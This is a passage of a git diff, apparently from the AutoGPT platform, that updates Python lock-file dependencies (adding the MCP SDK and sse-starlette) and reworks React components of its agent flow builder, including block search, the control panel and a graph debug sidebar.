{file = "httpx_sse-0.4.3.tar.gz", hash = "sha256:9b1ed0127459a66014aec3c56bebd93da3c1bc8bb6618c8082039a44889a755d"},
]
[[package]]
name = "huggingface-hub"
version = "1.4.1"
@@ -3310,6 +3345,39 @@ files = [
{file = "mccabe-0.7.0.tar.gz", hash = "sha256:348e0240c33b60bbdf4e523192ef919f28cb2c3d7d5c7794f74009290f236325"},
]
[[package]]
name = "mcp"
version = "1.26.0"
description = "Model Context Protocol SDK"
optional = false
python-versions = ">=3.10"
groups = ["main"]
files = [
{file = "mcp-1.26.0-py3-none-any.whl", hash = "sha256:904a21c33c25aa98ddbeb47273033c435e595bbacfdb177f4bd87f6dceebe1ca"},
{file = "mcp-1.26.0.tar.gz", hash = "sha256:db6e2ef491eecc1a0d93711a76f28dec2e05999f93afd48795da1c1137142c66"},
]
[package.dependencies]
anyio = ">=4.5"
httpx = ">=0.27.1"
httpx-sse = ">=0.4"
jsonschema = ">=4.20.0"
pydantic = ">=2.11.0,<3.0.0"
pydantic-settings = ">=2.5.2"
pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
python-multipart = ">=0.0.9"
pywin32 = {version = ">=310", markers = "sys_platform == \"win32\""}
sse-starlette = ">=1.6.1"
starlette = ">=0.27"
typing-extensions = ">=4.9.0"
typing-inspection = ">=0.4.1"
uvicorn = {version = ">=0.31.1", markers = "sys_platform != \"emscripten\""}
[package.extras]
cli = ["python-dotenv (>=1.0.0)", "typer (>=0.16.0)"]
rich = ["rich (>=13.9.4)"]
ws = ["websockets (>=15.0.1)"]
[[package]]
name = "mdurl"
version = "0.1.2"
@@ -5994,7 +6062,7 @@ description = "Python for Window Extensions"
optional = false
python-versions = "*"
groups = ["main"]
markers = "platform_system == \"Windows\""
markers = "sys_platform == \"win32\" or platform_system == \"Windows\""
files = [
{file = "pywin32-311-cp310-cp310-win32.whl", hash = "sha256:d03ff496d2a0cd4a5893504789d4a15399133fe82517455e78bad62efbb7f0a3"},
{file = "pywin32-311-cp310-cp310-win_amd64.whl", hash = "sha256:797c2772017851984b97180b0bebe4b620bb86328e8a884bb626156295a63b3b"},
@@ -6974,6 +7042,28 @@ postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"]
pymysql = ["pymysql"]
sqlcipher = ["sqlcipher3_binary"]
[[package]]
name = "sse-starlette"
version = "3.2.0"
description = "SSE plugin for Starlette"
optional = false
python-versions = ">=3.9"
groups = ["main"]
files = [
{file = "sse_starlette-3.2.0-py3-none-any.whl", hash = "sha256:5876954bd51920fc2cd51baee47a080eb88a37b5b784e615abb0b283f801cdbf"},
{file = "sse_starlette-3.2.0.tar.gz", hash = "sha256:8127594edfb51abe44eac9c49e59b0b01f1039d0c7461c6fd91d4e03b70da422"},
]
[package.dependencies]
anyio = ">=4.7.0"
starlette = ">=0.49.1"
[package.extras]
daphne = ["daphne (>=4.2.0)"]
examples = ["aiosqlite (>=0.21.0)", "fastapi (>=0.115.12)", "sqlalchemy[asyncio] (>=2.0.41)", "uvicorn (>=0.34.0)"]
granian = ["granian (>=2.3.1)"]
uvicorn = ["uvicorn (>=0.34.0)"]
[[package]]
name = "stagehand"
version = "0.5.9"
@@ -8440,4 +8530,4 @@ cffi = ["cffi (>=1.17,<2.0) ; platform_python_implementation != \"PyPy\" and pyt
[metadata]
lock-version = "2.1"
python-versions = ">=3.10,<3.14"
content-hash = "c06e96ad49388ba7a46786e9ea55ea2c1a57408e15613237b4bee40a592a12af"
content-hash = "942dea6daf671c3be65a22f3445feda26c1af9409d7173765e9a0742f0aa05dc"

View File

@@ -16,6 +16,7 @@ anthropic = "^0.79.0"
apscheduler = "^3.11.1"
autogpt-libs = { path = "../autogpt_libs", develop = true }
bleach = { extras = ["css"], version = "^6.2.0" }
claude-agent-sdk = "^0.1.0"
click = "^8.2.0"
cryptography = "^46.0"
discord-py = "^2.5.2"

View File

@@ -0,0 +1,31 @@
"use client";
import { Tabs, TabsList, TabsTrigger } from "@/components/__legacy__/ui/tabs";
export type BuilderView = "old" | "new";
export function BuilderViewTabs({
value,
onChange,
}: {
value: BuilderView;
onChange: (value: BuilderView) => void;
}) {
return (
<div className="pointer-events-auto fixed right-4 top-20 z-50">
<Tabs
value={value}
onValueChange={(v: string) => onChange(v as BuilderView)}
>
<TabsList className="w-fit bg-zinc-900">
<TabsTrigger value="old" className="text-gray-100">
Old
</TabsTrigger>
<TabsTrigger value="new" className="text-gray-100">
New
</TabsTrigger>
</TabsList>
</Tabs>
</div>
);
}

View File

@@ -23,9 +23,6 @@ import { useCopyPaste } from "./useCopyPaste";
import { useFlow } from "./useFlow";
import { useFlowRealtime } from "./useFlowRealtime";
import "@xyflow/react/dist/style.css";
import "./flow.css";
export const Flow = () => {
const [{ flowID, flowExecutionID }] = useQueryStates({
flowID: parseAsString,

View File

@@ -1,9 +0,0 @@
/* Reset default xyflow handle styles so custom Phosphor icon handles render correctly */
.react-flow__handle {
background: transparent;
width: auto;
height: auto;
border: 0;
position: relative;
transform: none;
}

View File

@@ -1,30 +1,100 @@
// import { Separator } from "@/components/__legacy__/ui/separator";
import { cn } from "@/lib/utils";
import React, { memo } from "react";
import { BlockMenu } from "./NewBlockMenu/BlockMenu/BlockMenu";
import { useNewControlPanel } from "./useNewControlPanel";
// import { NewSaveControl } from "../SaveControl/NewSaveControl";
import { GraphExecutionID } from "@/lib/autogpt-server-api";
// import { ControlPanelButton } from "../ControlPanelButton";
// import { GraphSearchMenu } from "../GraphMenu/GraphMenu";
import { Separator } from "@/components/__legacy__/ui/separator";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { CustomNode } from "../FlowEditor/nodes/CustomNode/CustomNode";
import { NewSaveControl } from "./NewSaveControl/NewSaveControl";
import { UndoRedoButtons } from "./UndoRedoButtons";
export const NewControlPanel = memo(() => {
useNewControlPanel({});
export type Control = {
icon: React.ReactNode;
label: string;
disabled?: boolean;
onClick: () => void;
};
return (
<section
className={cn(
"absolute left-4 top-10 z-10 overflow-hidden rounded-[1rem] border-none bg-white p-0 shadow-[0_1px_5px_0_rgba(0,0,0,0.1)]",
)}
>
<div className="flex flex-col items-center justify-center rounded-[1rem] p-0">
<BlockMenu />
<Separator className="text-[#E1E1E1]" />
<NewSaveControl />
<Separator className="text-[#E1E1E1]" />
<UndoRedoButtons />
</div>
</section>
);
});
export type NewControlPanelProps = {
flowExecutionID?: GraphExecutionID | undefined;
visualizeBeads?: "no" | "static" | "animate";
pinSavePopover?: boolean;
pinBlocksPopover?: boolean;
nodes?: CustomNode[];
onNodeSelect?: (nodeId: string) => void;
onNodeHover?: (nodeId: string) => void;
};
export const NewControlPanel = memo(
({
flowExecutionID: _flowExecutionID,
visualizeBeads: _visualizeBeads,
pinSavePopover: _pinSavePopover,
pinBlocksPopover: _pinBlocksPopover,
nodes: _nodes,
onNodeSelect: _onNodeSelect,
onNodeHover: _onNodeHover,
}: NewControlPanelProps) => {
const _isGraphSearchEnabled = useGetFlag(Flag.GRAPH_SEARCH);
const {
// agentDescription,
// setAgentDescription,
// saveAgent,
// agentName,
// setAgentName,
// savedAgent,
// isSaving,
// isRunning,
// isStopping,
} = useNewControlPanel({});
return (
<section
className={cn(
"absolute left-4 top-10 z-10 overflow-hidden rounded-[1rem] border-none bg-white p-0 shadow-[0_1px_5px_0_rgba(0,0,0,0.1)]",
)}
>
<div className="flex flex-col items-center justify-center rounded-[1rem] p-0">
<BlockMenu />
{/* <Separator className="text-[#E1E1E1]" />
{isGraphSearchEnabled && (
<>
<GraphSearchMenu
nodes={nodes}
blockMenuSelected={blockMenuSelected}
setBlockMenuSelected={setBlockMenuSelected}
onNodeSelect={onNodeSelect}
onNodeHover={onNodeHover}
/>
<Separator className="text-[#E1E1E1]" />
</>
)}
{controls.map((control, index) => (
<ControlPanelButton
key={index}
onClick={() => control.onClick()}
data-id={`control-button-${index}`}
data-testid={`blocks-control-${control.label.toLowerCase()}-button`}
disabled={control.disabled || false}
className="rounded-none"
>
{control.icon}
</ControlPanelButton>
))} */}
<Separator className="text-[#E1E1E1]" />
<NewSaveControl />
<Separator className="text-[#E1E1E1]" />
<UndoRedoButtons />
</div>
</section>
);
},
);
export default NewControlPanel;

View File

@@ -1,4 +1,4 @@
import { CustomNode } from "../../../FlowEditor/nodes/CustomNode/CustomNode";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import {
Popover,
PopoverContent,

View File

@@ -1,5 +1,5 @@
import { useGraphSearch } from "../GraphMenuSearchBar/useGraphMenuSearchBar";
import { CustomNode } from "../../../FlowEditor/nodes/CustomNode/CustomNode";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
interface UseGraphMenuProps {
nodes: CustomNode[];

View File

@@ -1,7 +1,7 @@
import React from "react";
import { Separator } from "@/components/__legacy__/ui/separator";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { beautifyString, categoryColorMap } from "@/lib/utils";
import { beautifyString, getPrimaryCategoryColor } from "@/lib/utils";
import { SearchableNode } from "../GraphMenuSearchBar/useGraphMenuSearchBar";
import { TextRenderer } from "@/components/__legacy__/ui/render";
import {
@@ -73,12 +73,14 @@ export const GraphSearchContent: React.FC<GraphSearchContentProps> = ({
}
const nodeTitle =
(node.data?.metadata?.customized_name as string) ||
beautifyString(node.data?.title || "").replace(/ Block$/, "");
const nodeType = beautifyString(node.data?.title || "").replace(
/ Block$/,
"",
);
node.data?.metadata?.customized_name ||
beautifyString(node.data?.blockType || "").replace(
/ Block$/,
"",
);
const nodeType = beautifyString(
node.data?.blockType || "",
).replace(/ Block$/, "");
return (
<TooltipProvider key={node.id}>
@@ -98,13 +100,7 @@ export const GraphSearchContent: React.FC<GraphSearchContentProps> = ({
onMouseLeave={() => onNodeHover?.(null)}
>
<div
className={`h-full w-3 rounded-l-[7px] ${
(node.data?.categories?.[0]?.category &&
categoryColorMap[
node.data.categories[0].category
]) ||
"bg-gray-300 dark:bg-slate-700"
}`}
className={`h-full w-3 rounded-l-[7px] ${getPrimaryCategoryColor(node.data?.categories)}`}
/>
<div className="mx-3 flex flex-1 items-center justify-between">
<div className="mr-2 min-w-0">
@@ -133,10 +129,9 @@ export const GraphSearchContent: React.FC<GraphSearchContentProps> = ({
<div className="font-semibold">
Node Type: {nodeType}
</div>
{!!node.data?.metadata?.customized_name && (
{node.data?.metadata?.customized_name && (
<div className="text-xs text-gray-500">
Custom Name:{" "}
{String(node.data.metadata.customized_name)}
Custom Name: {node.data.metadata.customized_name}
</div>
)}
</div>

View File

@@ -1,5 +1,5 @@
import { useState, useMemo, useDeferredValue } from "react";
import { CustomNode } from "../../../FlowEditor/nodes/CustomNode/CustomNode";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import { beautifyString } from "@/lib/utils";
import jaro from "jaro-winkler";
@@ -67,10 +67,10 @@ function calculateNodeScore(
const nodeTitle = (node.data?.title || "").toLowerCase(); // This includes the ID
const nodeId = (node.id || "").toLowerCase();
const nodeDescription = (node.data?.description || "").toLowerCase();
const blockType = (node.data?.title || "").toLowerCase();
const blockType = (node.data?.blockType || "").toLowerCase();
const beautifiedBlockType = beautifyString(blockType).toLowerCase();
const customizedName = String(
node.data?.metadata?.customized_name || "",
const customizedName = (
node.data?.metadata?.customized_name || ""
).toLowerCase();
// Get input and output names with defensive checks

View File

@@ -1,18 +1,54 @@
import { GraphID } from "@/lib/autogpt-server-api";
import { useSearchParams } from "next/navigation";
import { useState } from "react";
export interface NewControlPanelProps {
// flowExecutionID: GraphExecutionID | undefined;
visualizeBeads?: "no" | "static" | "animate";
}
export const useNewControlPanel = ({
// flowExecutionID,
visualizeBeads: _visualizeBeads,
}: NewControlPanelProps) => {
const [blockMenuSelected, setBlockMenuSelected] = useState<
"save" | "block" | "search" | ""
>("");
const query = useSearchParams();
const _graphVersion = query.get("flowVersion");
const _graphVersionParsed = _graphVersion
? parseInt(_graphVersion)
: undefined;
const _flowID = (query.get("flowID") as GraphID | null) ?? undefined;
// const {
// agentDescription,
// setAgentDescription,
// saveAgent,
// agentName,
// setAgentName,
// savedAgent,
// isSaving,
// isRunning,
// isStopping,
// } = useAgentGraph(
// flowID,
// graphVersion,
// flowExecutionID,
// visualizeBeads !== "no",
// );
return {
blockMenuSelected,
setBlockMenuSelected,
// agentDescription,
// setAgentDescription,
// saveAgent,
// agentName,
// setAgentName,
// savedAgent,
// isSaving,
// isRunning,
// isStopping,
};
};

View File

@@ -0,0 +1,83 @@
import { useMemo } from "react";
import { Link } from "@/app/api/__generated__/models/link";
import { useEdgeStore } from "../stores/edgeStore";
import { useNodeStore } from "../stores/nodeStore";
import { scrollbarStyles } from "@/components/styles/scrollbars";
import { cn } from "@/lib/utils";
import { customEdgeToLink } from "./helper";
export const RightSidebar = () => {
const edges = useEdgeStore((s) => s.edges);
const nodes = useNodeStore((s) => s.nodes);
const backendLinks: Link[] = useMemo(
() => edges.map(customEdgeToLink),
[edges],
);
return (
<div
className={cn(
"flex h-full w-full flex-col border-l border-slate-200 bg-white p-4 dark:border-slate-700 dark:bg-slate-900",
scrollbarStyles,
)}
>
<div className="mb-4">
<h2 className="text-lg font-semibold text-slate-800 dark:text-slate-200">
Graph Debug Panel
</h2>
</div>
<div className="flex-1 overflow-y-auto">
<h3 className="mb-2 text-sm font-semibold text-slate-700 dark:text-slate-200">
Nodes ({nodes.length})
</h3>
<div className="mb-6 space-y-3">
{nodes.map((n) => (
<div
key={n.id}
className="rounded border p-2 text-xs dark:border-slate-700"
>
<div className="mb-1 font-medium">
#{n.id} {n.data?.title ? ` ${n.data.title}` : ""}
</div>
<div className="text-slate-500 dark:text-slate-400">
hardcodedValues
</div>
<pre className="mt-1 max-h-40 overflow-auto rounded bg-slate-50 p-2 dark:bg-slate-800">
{JSON.stringify(n.data?.hardcodedValues ?? {}, null, 2)}
</pre>
</div>
))}
</div>
<h3 className="mb-2 text-sm font-semibold text-slate-700 dark:text-slate-200">
Links ({backendLinks.length})
</h3>
<div className="mb-6 space-y-3">
{backendLinks.map((l) => (
<div
key={l.id}
className="rounded border p-2 text-xs dark:border-slate-700"
>
<div className="font-medium">
{l.source_id}[{l.source_name}] {l.sink_id}[{l.sink_name}]
</div>
<div className="mt-1 text-slate-500 dark:text-slate-400">
edge.id: {l.id}
</div>
</div>
))}
</div>
<h4 className="mb-2 text-xs font-semibold text-slate-600 dark:text-slate-300">
Backend Links JSON
</h4>
<pre className="max-h-64 overflow-auto rounded bg-slate-50 p-2 text-[11px] dark:bg-slate-800">
{JSON.stringify(backendLinks, null, 2)}
</pre>
</div>
</div>
);
};

View File

@@ -0,0 +1,443 @@
import React, { useCallback, useMemo, useState, useDeferredValue } from "react";
import { Card, CardContent, CardHeader } from "@/components/__legacy__/ui/card";
import { Label } from "@/components/__legacy__/ui/label";
import { Button } from "@/components/__legacy__/ui/button";
import { Input } from "@/components/__legacy__/ui/input";
import { TextRenderer } from "@/components/__legacy__/ui/render";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import { beautifyString } from "@/lib/utils";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import {
Block,
BlockIORootSchema,
BlockUIType,
GraphInputSchema,
GraphOutputSchema,
SpecialBlockID,
} from "@/lib/autogpt-server-api";
import { MagnifyingGlassIcon, PlusIcon } from "@radix-ui/react-icons";
import { IconToyBrick } from "@/components/__legacy__/ui/icons";
import { getPrimaryCategoryColor } from "@/lib/utils";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { GraphMeta } from "@/lib/autogpt-server-api";
import jaro from "jaro-winkler";
import { getV1GetSpecificGraph } from "@/app/api/__generated__/endpoints/graphs/graphs";
import { okData } from "@/app/api/helpers";
type _Block = Omit<Block, "inputSchema" | "outputSchema"> & {
uiKey?: string;
inputSchema: BlockIORootSchema | GraphInputSchema;
outputSchema: BlockIORootSchema | GraphOutputSchema;
hardcodedValues?: Record<string, any>;
_cached?: {
blockName: string;
beautifiedName: string;
description: string;
};
};
// Hook to preprocess blocks with cached expensive operations
const useSearchableBlocks = (blocks: _Block[]): _Block[] => {
return useMemo(
() =>
blocks.map((block) => {
if (!block._cached) {
block._cached = {
blockName: block.name.toLowerCase(),
beautifiedName: beautifyString(block.name).toLowerCase(),
description: block.description.toLowerCase(),
};
}
return block;
}),
[blocks],
);
};
interface BlocksControlProps {
blocks: _Block[];
addBlock: (
id: string,
name: string,
hardcodedValues: Record<string, any>,
) => void;
pinBlocksPopover: boolean;
flows: GraphMeta[];
nodes: CustomNode[];
}
/**
* A React functional component that displays a control for managing blocks.
*
* @component
* @param {Object} BlocksControlProps - The properties for the BlocksControl component.
* @param {Block[]} BlocksControlProps.blocks - An array of blocks to be displayed and filtered.
* @param {(id: string, name: string, hardcodedValues: Record<string, any>) => void} BlocksControlProps.addBlock - A function to call when a block is added.
* @returns The rendered BlocksControl component.
*/
export function BlocksControl({
blocks: _blocks,
addBlock,
pinBlocksPopover,
flows,
nodes,
}: BlocksControlProps) {
const [searchQuery, setSearchQuery] = useState("");
const deferredSearchQuery = useDeferredValue(searchQuery);
const [selectedCategory, setSelectedCategory] = useState<string | null>(null);
const blocks = useSearchableBlocks(_blocks);
const graphHasWebhookNodes = nodes.some((n) =>
[BlockUIType.WEBHOOK, BlockUIType.WEBHOOK_MANUAL].includes(n.data.uiType),
);
const graphHasInputNodes = nodes.some(
(n) => n.data.uiType == BlockUIType.INPUT,
);
const filteredAvailableBlocks = useMemo(() => {
const blockList = blocks
.filter((b) => b.uiType !== BlockUIType.AGENT)
.sort((a, b) => a.name.localeCompare(b.name));
// Agent blocks are created from GraphMeta which doesn't include schemas.
// Schemas will be fetched on-demand when the block is actually added.
const agentBlockList = flows
.map((flow): _Block => {
return {
id: SpecialBlockID.AGENT,
name: flow.name,
description:
`Ver.${flow.version}` +
(flow.description ? ` | ${flow.description}` : ""),
categories: [{ category: "AGENT", description: "" }],
// Empty schemas - will be populated when block is added
inputSchema: { type: "object", properties: {} },
outputSchema: { type: "object", properties: {} },
staticOutput: false,
uiType: BlockUIType.AGENT,
costs: [],
uiKey: flow.id,
hardcodedValues: {
graph_id: flow.id,
graph_version: flow.version,
// Schemas will be fetched on-demand when block is added
},
};
})
.map(
(agentBlock): _Block => ({
...agentBlock,
_cached: {
blockName: agentBlock.name.toLowerCase(),
beautifiedName: beautifyString(agentBlock.name).toLowerCase(),
description: agentBlock.description.toLowerCase(),
},
}),
);
return blockList
.concat(agentBlockList)
.map((block) => ({
block,
score: blockScoreForQuery(block, deferredSearchQuery),
}))
.filter(
({ block, score }) =>
score > 0 &&
(!selectedCategory ||
block.categories.some((cat) => cat.category === selectedCategory)),
)
.sort((a, b) => b.score - a.score)
.map(({ block }) => ({
...block,
notAvailable:
(block.uiType == BlockUIType.WEBHOOK &&
graphHasWebhookNodes &&
"Agents can only have one webhook-triggered block") ||
(block.uiType == BlockUIType.WEBHOOK &&
graphHasInputNodes &&
"Webhook-triggered blocks can't be used together with input blocks") ||
(block.uiType == BlockUIType.INPUT &&
graphHasWebhookNodes &&
"Input blocks can't be used together with a webhook-triggered block") ||
null,
}));
}, [
blocks,
flows,
selectedCategory,
deferredSearchQuery,
graphHasInputNodes,
graphHasWebhookNodes,
]);
const resetFilters = useCallback(() => {
setSearchQuery("");
setSelectedCategory(null);
}, []);
// Handler to add a block, fetching graph data on-demand for agent blocks
const handleAddBlock = useCallback(
async (block: _Block & { notAvailable: string | null }) => {
if (block.notAvailable) return;
// For agent blocks, fetch the full graph to get schemas
if (block.uiType === BlockUIType.AGENT && block.hardcodedValues) {
const graphID = block.hardcodedValues.graph_id as string;
const graphVersion = block.hardcodedValues.graph_version as number;
const graphData = okData(
await getV1GetSpecificGraph(graphID, { version: graphVersion }),
);
if (graphData) {
addBlock(block.id, block.name, {
...block.hardcodedValues,
input_schema: graphData.input_schema,
output_schema: graphData.output_schema,
});
} else {
// Fallback: add without schemas (will be incomplete)
console.error("Failed to fetch graph data for agent block");
addBlock(block.id, block.name, block.hardcodedValues || {});
}
} else {
addBlock(block.id, block.name, block.hardcodedValues || {});
}
},
[addBlock],
);
// Extract unique categories from blocks
const categories = useMemo(() => {
return Array.from(
new Set([
null,
...blocks
.flatMap((block) => block.categories.map((cat) => cat.category))
.sort(),
]),
);
}, [blocks]);
return (
<Popover
open={pinBlocksPopover ? true : undefined}
onOpenChange={(open) => open || resetFilters()}
>
<Tooltip delayDuration={500}>
<TooltipTrigger asChild>
<PopoverTrigger asChild>
<Button
variant="ghost"
size="icon"
data-id="blocks-control-popover-trigger"
data-testid="blocks-control-blocks-button"
name="Blocks"
className="dark:hover:bg-slate-800"
>
<IconToyBrick />
</Button>
</PopoverTrigger>
</TooltipTrigger>
<TooltipContent side="right">Blocks</TooltipContent>
</Tooltip>
<PopoverContent
side="right"
sideOffset={22}
align="start"
className="absolute -top-3 w-[17rem] rounded-xl border-none p-0 shadow-none md:w-[30rem]"
data-id="blocks-control-popover-content"
>
<Card className="p-3 pb-0 dark:bg-slate-900">
<CardHeader className="flex flex-col gap-x-8 gap-y-1 p-3 px-2">
<div className="items-center justify-between">
<Label
htmlFor="search-blocks"
className="whitespace-nowrap text-base font-bold text-black dark:text-white 2xl:text-xl"
data-id="blocks-control-label"
data-testid="blocks-control-blocks-label"
>
Blocks
</Label>
</div>
<div className="relative flex items-center">
<MagnifyingGlassIcon className="absolute m-2 h-5 w-5 text-gray-500 dark:text-gray-400" />
<Input
id="search-blocks"
type="text"
placeholder="Search blocks"
value={searchQuery}
onChange={(e) => setSearchQuery(e.target.value)}
className="rounded-lg px-8 py-5 dark:bg-slate-800 dark:text-white"
data-id="blocks-control-search-input"
autoComplete="off"
/>
</div>
<div
className="mt-2 flex flex-wrap gap-2"
data-testid="blocks-categories-list"
>
{categories.map((category) => {
const color = getPrimaryCategoryColor([
{ category: category || "All", description: "" },
]);
const colorClass =
selectedCategory === category ? `${color}` : "";
return (
<div
key={category}
data-testid="blocks-category"
role="button"
className={`cursor-pointer rounded-xl border px-2 py-2 text-xs font-medium dark:border-slate-700 dark:text-white ${colorClass}`}
onClick={() =>
setSelectedCategory(
selectedCategory === category ? null : category,
)
}
>
{beautifyString((category || "All").toLowerCase())}
</div>
);
})}
</div>
</CardHeader>
<CardContent className="overflow-scroll border-t border-t-gray-200 p-0 dark:border-t-slate-700">
<ScrollArea
className="h-[60vh] w-full"
data-id="blocks-control-scroll-area"
>
{filteredAvailableBlocks.map((block) => (
<Card
key={block.uiKey || block.id}
className={`m-2 my-4 flex h-20 shadow-none dark:border-slate-700 dark:bg-slate-800 dark:text-slate-100 dark:hover:bg-slate-700 ${
block.notAvailable
? "cursor-not-allowed opacity-50"
: "cursor-move hover:shadow-lg"
}`}
data-id={`block-card-${block.id}`}
draggable={!block.notAvailable}
onDragStart={(e) => {
if (block.notAvailable) return;
e.dataTransfer.effectAllowed = "copy";
e.dataTransfer.setData(
"application/reactflow",
JSON.stringify({
blockId: block.id,
blockName: block.name,
hardcodedValues: block?.hardcodedValues || {},
}),
);
}}
onClick={() => handleAddBlock(block)}
title={block.notAvailable ?? undefined}
>
<div
className={`-ml-px h-full w-3 rounded-l-xl ${getPrimaryCategoryColor(block.categories)}`}
></div>
<div className="mx-3 flex flex-1 items-center justify-between">
<div className="mr-2 min-w-0">
<span
className="block truncate pb-1 text-sm font-semibold dark:text-white"
data-id={`block-name-${block.id}`}
data-type={block.uiType}
data-testid={`block-name-${block.id}`}
>
<TextRenderer
value={beautifyString(block.name).replace(
/ Block$/,
"",
)}
truncateLengthLimit={45}
/>
</span>
<span
className="block break-all text-xs font-normal text-gray-500 dark:text-gray-400"
data-testid={`block-description-${block.id}`}
>
<TextRenderer
value={block.description}
truncateLengthLimit={165}
/>
</span>
</div>
<div
className="flex flex-shrink-0 items-center gap-1"
data-id={`block-tooltip-${block.id}`}
data-testid={`block-add`}
>
<PlusIcon className="h-6 w-6 rounded-lg bg-gray-200 stroke-black stroke-[0.5px] p-1 dark:bg-gray-700 dark:stroke-white" />
</div>
</div>
</Card>
))}
</ScrollArea>
</CardContent>
</Card>
</PopoverContent>
</Popover>
);
}
/**
* Evaluates how well a block matches the search query and returns a relevance score.
* The scoring algorithm works as follows:
* - Returns 1 if no query (all blocks match equally)
* - Normalizes the query for case-insensitive matching
* - Returns 3 for exact substring matches in block name (highest priority)
* - Returns 2 when all query words appear in the block name (regardless of order)
* - Returns 1.X for blocks with names similar to query using Jaro-Winkler distance (X is similarity score)
* - Returns 0.5 when all query words appear in the block description (lowest priority)
* - Returns 0 for no match
*
* Higher scores will appear first in search results.
*/
function blockScoreForQuery(block: _Block, query: string): number {
if (!query) return 1;
const normalizedQuery = query.toLowerCase().trim();
const queryWords = normalizedQuery.split(/\s+/);
// Use cached values for performance
const { blockName, beautifiedName, description } = block._cached!;
// 1. Exact match in name (highest priority)
if (
blockName.includes(normalizedQuery) ||
beautifiedName.includes(normalizedQuery)
) {
return 3;
}
// 2. All query words in name (regardless of order)
const allWordsInName = queryWords.every(
(word) => blockName.includes(word) || beautifiedName.includes(word),
);
if (allWordsInName) return 2;
// 3. Similarity with name (Jaro-Winkler)
const similarityThreshold = 0.65;
const nameSimilarity = jaro(blockName, normalizedQuery);
const beautifiedSimilarity = jaro(beautifiedName, normalizedQuery);
const maxSimilarity = Math.max(nameSimilarity, beautifiedSimilarity);
if (maxSimilarity > similarityThreshold) {
return 1 + maxSimilarity; // Score between 1 and 2
}
// 4. All query words in description (lower priority)
const allWordsInDescription = queryWords.every((word) =>
description.includes(word),
);
if (allWordsInDescription) return 0.5;
return 0;
}

View File

@@ -0,0 +1,119 @@
import React from "react";
import { cn } from "@/lib/utils";
import { Button } from "@/components/__legacy__/ui/button";
import { LogOut } from "lucide-react";
import { ClockIcon, WarningIcon } from "@phosphor-icons/react";
import { IconPlay, IconSquare } from "@/components/__legacy__/ui/icons";
interface Props {
onClickAgentOutputs?: () => void;
onClickRunAgent?: () => void;
onClickStopRun: () => void;
onClickScheduleButton?: () => void;
isRunning: boolean;
isDisabled: boolean;
className?: string;
resolutionModeActive?: boolean;
}
export const BuildActionBar: React.FC<Props> = ({
onClickAgentOutputs,
onClickRunAgent,
onClickStopRun,
onClickScheduleButton,
isRunning,
isDisabled,
className,
resolutionModeActive = false,
}) => {
const buttonClasses =
"flex items-center gap-2 text-sm font-medium md:text-lg";
// Show resolution mode message instead of action buttons
if (resolutionModeActive) {
return (
<div
className={cn(
"flex w-fit select-none items-center justify-center p-4",
className,
)}
>
<div className="flex items-center gap-3 rounded-lg border border-amber-300 bg-amber-50 px-4 py-3 dark:border-amber-700 dark:bg-amber-900/30">
<WarningIcon className="size-5 text-amber-600 dark:text-amber-400" />
<span className="text-sm font-medium text-amber-800 dark:text-amber-200">
Remove incompatible connections to continue
</span>
</div>
</div>
);
}
return (
<div
className={cn(
"flex w-fit select-none items-center justify-center p-4",
className,
)}
>
<div className="flex gap-1 md:gap-4">
{onClickAgentOutputs && (
<Button
className={buttonClasses}
variant="outline"
size="primary"
onClick={onClickAgentOutputs}
title="View agent outputs"
>
<LogOut className="hidden size-5 md:flex" /> Agent Outputs
</Button>
)}
{!isRunning ? (
<Button
className={cn(
buttonClasses,
onClickRunAgent && isDisabled
? "cursor-default opacity-50 hover:bg-accent"
: "",
)}
variant="accent"
size="primary"
onClick={onClickRunAgent}
disabled={!onClickRunAgent}
title="Run the agent"
aria-label="Run the agent"
data-testid="primary-action-run-agent"
data-tutorial-id="primary-action-run-agent"
>
<IconPlay /> Run
</Button>
) : (
<Button
className={buttonClasses}
variant="destructive"
size="primary"
onClick={onClickStopRun}
title="Stop the agent"
data-id="primary-action-stop-agent"
>
<IconSquare /> Stop
</Button>
)}
{onClickScheduleButton && (
<Button
className={buttonClasses}
variant="outline"
size="primary"
onClick={onClickScheduleButton}
title="Set up a run schedule for the agent"
data-id="primary-action-schedule-agent"
>
<ClockIcon className="hidden h-5 w-5 md:flex" />
Schedule Run
</Button>
)}
</div>
</div>
);
};

View File

@@ -0,0 +1,33 @@
import {
BaseEdge,
ConnectionLineComponentProps,
Node,
getBezierPath,
Position,
} from "@xyflow/react";
export default function ConnectionLine<NodeType extends Node>({
fromPosition,
fromHandle,
fromX,
fromY,
toPosition,
toX,
toY,
}: ConnectionLineComponentProps<NodeType>) {
const sourceX =
fromPosition === Position.Right
? fromX + ((fromHandle?.width ?? 0) / 2 - 5)
: fromX - ((fromHandle?.width ?? 0) / 2 - 5);
const [path] = getBezierPath({
sourceX: sourceX,
sourceY: fromY,
sourcePosition: fromPosition,
targetX: toX,
targetY: toY,
targetPosition: toPosition,
});
return <BaseEdge path={path} style={{ strokeWidth: 2, stroke: "#555" }} />;
}

View File

@@ -0,0 +1,86 @@
import { Card, CardContent } from "@/components/__legacy__/ui/card";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { Button } from "@/components/__legacy__/ui/button";
import { Separator } from "@/components/__legacy__/ui/separator";
import { cn } from "@/lib/utils";
import React from "react";
/**
* Represents a control element for the ControlPanel Component.
* @type {Object} Control
* @property {React.ReactNode} icon - The icon of the control from lucide-react https://lucide.dev/icons/
* @property {string} label - The label of the control, to be leveraged by ToolTip.
* @property {onclick} onClick - The function to be executed when the control is clicked.
*/
export type Control = {
icon: React.ReactNode;
label: string;
disabled?: boolean;
onClick: () => void;
};
interface ControlPanelProps {
controls: Control[];
topChildren?: React.ReactNode;
botChildren?: React.ReactNode;
className?: string;
}
/**
